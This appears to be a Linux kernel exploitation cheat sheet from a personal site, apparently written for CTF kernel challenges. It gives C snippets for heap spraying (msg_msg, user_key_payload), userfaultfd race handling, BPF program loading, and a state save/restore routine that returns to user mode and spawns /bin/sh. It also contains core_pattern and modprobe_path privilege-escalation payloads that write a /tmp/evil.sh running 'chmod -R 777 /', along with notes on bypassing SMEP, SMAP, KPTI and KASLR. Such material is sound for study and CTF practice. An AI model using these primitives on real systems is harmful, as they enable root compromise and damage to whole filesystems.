.off = 0, \ .imm = IMM}) /* Memory load, dst_reg = *(uint *) (src_reg + off16) */ #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Memory store, *(uint *) (dst_reg + off16) = src_reg */ #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Atomic memory add, *(uint *)(dst_reg + off16) += src_reg */ #define BPF_STX_XADD(SIZE, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_XADD, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Memory store, *(uint *) (dst_reg + off16) = imm32 */ #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn){.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM}) /* * Atomic operations: * * BPF_ADD *(uint *) (dst_reg + off16) += src_reg * BPF_AND *(uint *) (dst_reg + off16) &amp;= src_reg * BPF_OR *(uint *) (dst_reg + off16) |= src_reg * BPF_XOR *(uint *) (dst_reg + off16) ^= src_reg * BPF_ADD | BPF_FETCH src_reg = atomic_fetch_add(dst_reg + off16, * src_reg); BPF_AND | BPF_FETCH src_reg = atomic_fetch_and(dst_reg + * off16, src_reg); BPF_OR | BPF_FETCH src_reg = atomic_fetch_or(dst_reg + * off16, src_reg); BPF_XOR | BPF_FETCH src_reg = atomic_fetch_xor(dst_reg * + off16, src_reg); BPF_XCHG src_reg = atomic_xchg(dst_reg + * off16, src_reg) BPF_CMPXCHG r0 = atomic_cmpxchg(dst_reg + off16, * r0, src_reg) */ #define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = OP}) /* Conditional jumps against registers, if (dst_reg &#39;op&#39; src_reg) goto pc + * off16 */ #define BPF_JMP_REG(OP, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */ #define BPF_JMP32_REG(OP, DST, SRC, OFF) \ ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0}) /* Conditional jumps against immediates, if (dst_reg &#39;op&#39; imm32) goto pc + off16 */ #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn){.code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM}) /* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */ #define BPF_JMP32_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn){.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM}) /* Function call */ #define BPF_EMIT_CALL(FUNC) \ ((struct bpf_insn){.code = BPF_JMP | BPF_CALL, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = (FUNC)}) /* Raw code statement block */ #define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ ((struct bpf_insn){ \ .code = CODE, .dst_reg = DST, .src_reg = SRC, .off = OFF, .imm = IMM}) /* Program exit */ #define BPF_EXIT_INSN() \ ((struct bpf_insn){.code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0}) #endif</code></pre></div> <div class="collapsable-code"> <input id="473592816" type="checkbox" checked /> <label for="473592816"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">core_pattern.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdlib.h&gt; const char* new_core_pattern = &#34;|/tmp/evil.sh&#34;; system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;ulimit -c unlimited&#34;); uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe;</code></pre></div> <div class="collapsable-code"> <input id="951762348" type="checkbox" checked /> <label for="951762348"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">modprobe.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdlib.h&gt; const char* new_modprobe = &#34;/tmp/evil.sh&#34;; system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;);</code></pre></div> <div class="collapsable-code"> <input id="689753214" type="checkbox" checked /> <label for="689753214"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">creds.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdio.h&gt; #include &lt;sys/prctl.h&gt; const char new_process_name[] = &#34;uniguri&#34;; if (prctl(PR_SET_NAME, new_process_name) == -1) { printf(&#34;[-] Failed to set process name\n&#34;); return -1; }</code></pre></div> <h2 id="scripts">Scripts</h2> <div class="collapsable-code"> <input id="748165932" type="checkbox" checked /> <label for="748165932"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">build_exploit.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh # Check if an argument is provided if [ $# -eq 0 ]; then echo &#34;Usage: $0 &lt;source_file.c&gt;&#34; exit 1 fi # Extract the base name without the .c extension SOURCE_FILE=$1 OUTPUT_FILE=$(dirname &#34;$SOURCE_FILE&#34;)/$(basename &#34;$SOURCE_FILE&#34; .c) # Compile the file musl-gcc &#34;$SOURCE_FILE&#34; -masm=intel -o &#34;$OUTPUT_FILE&#34; -static -pthread # Check if the compilation was successful if [ $? -eq 0 ]; then echo &#34;Compilation successful: $OUTPUT_FILE&#34; else echo &#34;Compilation failed.&#34; exit 1 fi</code></pre></div> <div class="collapsable-code"> <input id="375148962" type="checkbox" checked /> <label for="375148962"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">copy_exploit.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh if [ $# -eq 0 ]; then echo &#34;Usage: $0 &lt;exploit_binary&gt;&#34; exit 1 fi cp $1 ./root/</code></pre></div> <div class="collapsable-code"> <input id="645279138" type="checkbox" checked /> <label for="645279138"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">pack_rootfs.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh cd root find . -print0 | cpio -o --format=newc --null --owner=root &gt; ../rootfs_updated.cpio</code></pre></div> <div class="collapsable-code"> <input id="391627854" type="checkbox" checked /> <label for="391627854"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">build_compress_copy.sh</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh if [ $# -eq 0 ]; then echo &#34;Usage: $0 &lt;source_file.c&gt;&#34; exit 1 fi SOURCE_FILE=$1 OUTPUT_FILE=$(dirname &#34;$SOURCE_FILE&#34;)/$(basename &#34;$SOURCE_FILE&#34; .c) ./build_exploit.sh $SOURCE_FILE ./copy_exploit.sh $OUTPUT_FILE ./pack_rootfs.sh</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/">https://pawnyable.cafe/linux-kernel/</a></li> <li><a href="https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628">https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628</a></li> <li><a href="https://u1f383.github.io/cheatsheet/1970/01/01/welcome-to-jekyll.html">https://u1f383.github.io/cheatsheet/1970/01/01/welcome-to-jekyll.html</a></li> <li><a href="https://www.usenix.org/system/files/usenixsecurity24-maar-slubstick.pdf">https://www.usenix.org/system/files/usenixsecurity24-maar-slubstick.pdf</a></li> </ul> <hr> <h2 id="elastic-oeap-objects">Elastic oeap objects</h2> <table> <thead> <tr> <th>Struct name</th> <th>Generic caches</th> <th>Constraints</th> </tr> </thead> <tbody> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/keys/user-type.h"><code>struct user_key_payload</code></a></td> <td>kmalloc-[32,32767)</td> <td>only 200 allocation</td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/linux/mm_types.h"><code>struct anon_vma_name</code></a></td> <td>kmalloc-[8,96)</td> <td></td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/linux/msg.h"><code>struct msg_msg</code></a></td> <td>kmalloc-[64,4096)</td> <td>cg cache</td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/ipc/msgutil.c"><code>struct msg_msgseg</code></a></td> <td>kmalloc-[8,4096)</td> <td>cg cache</td> </tr> <tr> <td><a href="https://elixir.bootlin.com/linux/latest/source/include/drm/drm_property.h"><code>struct drm_property_blob</code></a></td> <td>kmalloc-[96,INT_MAX)</td> <td></td> </tr> <tr> <td><code>char* description</code> in <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/key.h"><code>struct key</code></a></td> <td>kmalloc-[8,4096</td> <td>)</td> </tr> </tbody> </table> <h2 id="mitigations">Mitigations</h2> <ul> <li>SMEP (Supervisor Mode Execution Prevention) <ul> <li>Why? <ul> <li>Prevent RET2USER</li> </ul> </li> <li>Activation: <code>-cpu kvm64,+smep</code> in QEMU runtime argument</li> <li>Check: <code>cat /proc/cpuinfo | grep smep</code></li> <li>Related HW feature: <code>CR4.SMEP</code></li> </ul> </li> <li>SMAP (Supervisor Mode Access Prevention) <ul> <li>Why? <ul> <li>Prevent Stack Pivot</li> </ul> </li> <li>Activation: <code>-cpu kvm64,+smap</code> in QEMU runtime argument</li> <li>Check: <code>cat /proc/cpuinfo | grep smap</code></li> <li>Related HW feature: <code>CR4.SMAP</code>, <code>EFLAGS.AC</code> (<code>STAC</code> and <code>CLAC</code> Assembly)</li> </ul> </li> <li>KASLR (Kernel Address Space Layout Randomization) / FGKASLR (Function Granular KASLR) <ul> <li>Entrophy: <code>0xffffffff81000000</code> ~ <code>0xffffffffc0000000</code></li> <li>Deactivation: <code>-append &quot;...nokaslr...&quot;</code></li> </ul> </li> <li>KPTI (Kernel Page-Table Isolation) <ul> <li>Why? <ul> <li>Prevent Meltdown</li> </ul> </li> <li>Activation: <code>-append &quot;...pti=on...&quot;</code></li> <li>Check: <code>cat /sys/devices/system/cpu/vulnerabilities/meltdown</code></li> <li>Related HW feature: <code>CR3</code></li> <li>Bypass: <ul> <li>If SMAP is disabled, <code>mmap(?, ?, ~ | MAP_POPULATE, ?, ?)</code></li> <li>If ROP is allowed, use <code>ireq</code> in <code>swapgs_restore_regs_and_return_to_usermode</code></li> </ul> </li> </ul> </li> <li>KADR (Kernel Address Display Restriction) <ul> <li>Why? <ul> <li>Hide address in <code>/proc/kallsyms</code></li> </ul> </li> <li>Check: <code>cat /proc/sys/kernel/kptr_restrict</code></li> </ul> </li> </ul> <h2 id="image-related">Image Related</h2> <ul> <li>Unpack CPIO: <code>cpio -idv &lt;../rootfs.cpio</code></li> <li>Pack CPIO: <code>find. -print0 | cpio -o --format=newc --null --owner=root &gt; ../rootfs_updated.cpio</code></li> </ul> <h2 id="debugging">Debugging</h2> <ul> <li>Extract vmlinux from bzImage from <a href="https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux">https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux</a>: <ul> <li> <div class="collapsable-code"> <input id="312654897" type="checkbox" checked /> <label for="312654897"> <span class="collapsable-code__language">bash</span> <span class="collapsable-code__title">extract-vmlinux</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-bash" > <code>#!/bin/sh # SPDX-License-Identifier: GPL-2.0-only # ---------------------------------------------------------------------- # extract-vmlinux - Extract uncompressed vmlinux from a kernel image # # Inspired from extract-ikconfig # (c) 2009,2010 Dick Streefland &lt;dick@streefland.net&gt; # # (c) 2011 Corentin Chary &lt;corentin.chary@gmail.com&gt; # # ---------------------------------------------------------------------- check_vmlinux() { # Use readelf to check if it&#39;s a valid ELF # TODO: find a better to way to check that it&#39;s really vmlinux # and not just an elf readelf -h $1 &gt; /dev/null 2&gt;&amp;1 || return 1 cat $1 exit 0 } try_decompress() { # The obscure use of the &#34;tr&#34; filter is to work around older versions of # &#34;grep&#34; that report the byte offset of the line instead of the pattern. # Try to find the header ($1) and decompress from here for pos in `tr &#34;$1\n$2&#34; &#34;\n$2=&#34; &lt; &#34;$img&#34; | grep -abo &#34;^$2&#34;` do pos=${pos%%:*} tail -c+$pos &#34;$img&#34; | $3 &gt; $tmp 2&gt; /dev/null check_vmlinux $tmp done } # Check invocation: me=${0##*/} img=$1 if [ $# -ne 1 -o ! -s &#34;$img&#34; ] then echo &#34;Usage: $me &lt;kernel-image&gt;&#34; &gt;&amp;2 exit 2 fi # Prepare temp files: tmp=$(mktemp /tmp/vmlinux-XXX) trap &#34;rm -f $tmp&#34; 0 # That didn&#39;t work, so retry after decompression. try_decompress &#39;\037\213\010&#39; xy gunzip try_decompress &#39;\3757zXZ\000&#39; abcde unxz try_decompress &#39;BZh&#39; xy bunzip2 try_decompress &#39;\135\0\0\0&#39; xxx unlzma try_decompress &#39;\211\114\132&#39; xy &#39;lzop -d&#39; try_decompress &#39;\002!L\030&#39; xxx &#39;lz4 -d&#39; try_decompress &#39;(\265/\375&#39; xxx unzstd # Finally check for uncompressed images or objects: check_vmlinux $img # Bail out: echo &#34;$me: Cannot find vmlinux.&#34; &gt;&amp;2</code></pre></div> </li> </ul> </li> </ul> <h2 id="build-exploit-code">Build Exploit Code</h2> <ul> <li>Use GLIBC: <code>gcc exploit.c -o exploit -static</code></li> <li>Use MUSL-GCC: <code>/usr/local/musl/bin/musl-gcc exploit.c -o exploit -static</code> <ul> <li>or: <code>gcc -S exploit.c -o exploit.S; musl-gcc exploit.S -o exploit.elf</code></li> </ul> </li> </ul> <h2 id="code-snippet">Code Snippet</h2> <div class="collapsable-code"> <input id="132875469" type="checkbox" checked /> <label for="132875469"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">utils.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #define KERNEL_BASE_START 0xffffffff81000000ull #define KERNEL_BASE_END 0xffffffffc0000000ull #define KERNEL_BASE_MASK (~0x00000000000fffffull) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt; KERNEL_BASE_END) #define MIN(x, y) (x) &lt; (y) ? (x) : (y) #define MAX(x, y) (x) &gt; (y) ? (x) : (y) static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); }</code></pre></div> <div class="collapsable-code"> <input id="218539746" type="checkbox" checked /> <label for="218539746"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">save_restore_state.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;stdint.h&gt; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } // For iretq // *rop_buf++ = (uint64_t)(get_shell); // user_rip // *rop_buf++ = (uint64_t)(user_cs); // *rop_buf++ = (uint64_t)(user_rflags); // *rop_buf++ = (uint64_t)(user_sp); // *rop_buf++ = (uint64_t)(user_ss);</code></pre></div> <div class="collapsable-code"> <input id="493872651" type="checkbox" checked /> <label for="493872651"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">cpu.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;sched.h&gt; void pin_to_core(size_t core); void pin_to_core(size_t core) { cpu_set_t target_cpu; CPU_ZERO(&amp;target_cpu); CPU_SET(core, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } }</code></pre></div> <div class="collapsable-code"> <input id="162748395" type="checkbox" checked /> <label for="162748395"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">user_key.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;linux/keyctl.h&gt; #include &lt;stdarg.h&gt; #include &lt;stdint.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; /** * type must be &#34;keyring&#34;, &#34;user&#34;, &#34;logon&#34;, or &#34;big_key&#34; */ static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid); static int32_t sys_keyctl(int cmd, ...); static int32_t sys_revoke_key(int32_t key); static int32_t sys_update_key(int32_t key, void *payload, size_t size); static int32_t sys_read_key(int32_t key, char *buf, size_t size); static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { return syscall(__NR_add_key, type, desc, payload, plen, ringid); } static int32_t sys_keyctl(int cmd, ...) { va_list ap; long arg2, arg3, arg4, arg5; va_start(ap, cmd); arg2 = va_arg(ap, long); arg3 = va_arg(ap, long); arg4 = va_arg(ap, long); arg5 = va_arg(ap, long); va_end(ap); return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5); } static int32_t sys_revoke_key(int32_t key) { return sys_keyctl(KEYCTL_REVOKE, key); } static int32_t sys_read_key(int32_t key, char *buf, size_t size) { return sys_keyctl(KEYCTL_READ, key, buf, size); } static int32_t sys_update_key(int32_t key, void *payload, size_t size) { return sys_keyctl(KEYCTL_UPDATE, key, payload, size); }</code></pre></div> <div class="collapsable-code"> <input id="561873924" type="checkbox" checked /> <label for="561873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">msgmsg.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;string.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/types.h&gt; int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, mflag); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, mflag); memcpy(data, m-&gt;mtext, size); free(m); return ret; } </code></pre></div> <div class="collapsable-code"> <input id="718324965" type="checkbox" checked /> <label for="718324965"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">uffd.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Check /proc/sys/vm/unprivileged_userfaultfd #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); if (uffd &lt; 0) { fatal(&#34;syscall(__NR_userfaultfd)&#34;); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } static void* userfault_template_handler(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_template_handler: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; puts(&#34;[*] userfault_template_handler: waiting for page fault...&#34;); pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_template_handler: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_template_handler: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal(&#34;userfault_template_handler: msg.event != UFFD_EVENT_PAGEFAULT&#34;); } printf(&#34;[*] userfault_template_handler: addr=0x%llx, flag=0x%llx\n&#34;, msg.arg.pagefault.address, msg.arg.pagefault.flags); // Main Routine copy.src = (uint64_t)page; // data of page will be data of faulted page copy.dst = (uint64_t)msg.arg.pagefault.address; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_template_handler: ioctl(UFFDIO_COPY)&#34;); } } munmap(page, 0x1000); return NULL; }</code></pre></div> <div class="collapsable-code"> <input id="126358749" type="checkbox" checked /> <label for="126358749"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">bpf.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Check /proc/sys/kernel/unprivileged_bpf_disabled #include &lt;asm-generic/socket.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } void bpf_template() { char verifier_log[0x10000]; uint64_t val = 0; int mapfd = bpf_map_create(sizeof(uint64_t), 1); bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff // Instructions BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } // Trigger the BPF program write(socks[1], &#34;UNIGURI&#34;, 7); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); }</code></pre></div> <div class="collapsable-code"> <input id="176932458" type="checkbox" checked /> <label for="176932458"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">bpf_insn.h</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */ /* eBPF instruction mini library */ #ifndef __BPF_INSN_H #define __BPF_INSN_H struct bpf_insn; /* ArgX, context and stack frame pointer register positions. Note, * Arg1, Arg2, Arg3, etc are used as argument mappings of function * calls in BPF_CALL instruction. */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 /* Additional register mappings for converted user programs. */ #define BPF_REG_A BPF_REG_0 #define BPF_REG_X BPF_REG_7 #define BPF_REG_TMP BPF_REG_8 /* BPF program can access up to 512 bytes of stack space. */ #define MAX_BPF_STACK 512 /* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */ #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) #define BPF_ALU32_REG(OP, DST, SRC) \ ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0}) /* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */ #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) #define BPF_ALU32_IMM(OP, DST, IMM) \ ((struct bpf_insn){.code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM}) /* Endianess conversion, cpu_to_{l,b}e(), {l,b}e_to_cpu() */ #define BPF_ENDIAN(TYPE, DST, LEN) \ ((struct bpf_insn){.code = BPF_ALU | BPF_END | 